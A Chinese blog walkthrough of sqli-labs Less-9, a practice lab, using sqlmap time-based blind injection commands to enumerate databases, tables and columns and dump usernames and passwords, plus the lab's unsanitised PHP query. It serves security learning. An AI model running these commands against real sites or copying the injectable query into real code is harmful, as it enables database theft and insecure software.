网络安全-sqlmap实战之sqlilabs-Less9

目录

 

类型

-dbs枚举数据库

--tables枚举数据库表

--columns枚举列

--dump枚举数据

查看源代码

---

类型

时间盲注-单引号

-dbs枚举数据库

使用-o参数优化,,--technique参数指定技术，--batch参数进行跳过

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" -o --technique T -dbs --batch

过程

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" --dbms mysql -o --technique T -dbs --batch

太慢，继续优化

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" --dbms mysql -o --technique T --time-sec 2 -dbs --batch

数据库

这还运行了6分钟，有小伙伴可以更快吗?下方评论，十分感谢！

--tables枚举数据库表

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" --dbms mysql -o --technique T --time-sec 2 -D security --tables --batch

表

--columns枚举列

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" --dbms mysql -o --technique T --time-sec 2 -D security -T users --columns --batch

 

列

--dump枚举数据

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" --dbms mysql -o --technique T --time-sec 2 -D security -T users -C username,password --dump --batch

 

查看源代码

$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

更多内容查看：网络安全-自学笔记

有问题请下方评论，转载请注明出处，并附有原文链接，谢谢！如有侵权，请及时联系。